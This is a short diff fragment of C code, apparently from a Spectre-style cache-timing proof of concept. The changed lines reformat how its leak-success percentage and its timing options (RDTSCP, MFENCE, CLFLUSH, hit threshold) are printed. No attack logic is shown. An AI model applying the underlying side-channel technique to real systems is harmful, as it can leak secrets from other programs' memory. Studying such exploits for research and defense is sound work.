printf("\"success\": %.0f } }", - 100 * successes / (float)strlen(secret)); + printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] %-27s\t",argv[0] + 2); #ifndef NORDTSCP - fprintf(stderr, "RDTSCP "); - #else - fprintf(stderr, 
"RDTSC "); - #endif - #ifndef NOMFENCE - fprintf(stderr, "MFENCE "); - #endif - #ifndef NOCLFLUSH - fprintf(stderr, "CLFLUSH "); - #endif - fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", - cache_hit_threshold, - 100 * successes / (float)strlen(secret)); + fprintf(stderr, "RDTSCP "); + #else + fprintf(stderr, "RDTSC "); + #endif + #ifndef NOMFENCE + fprintf(stderr, "MFENCE "); + #endif + #ifndef NOCLFLUSH + fprintf(stderr, "CLFLUSH "); + #endif + fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); free(target); return 0; }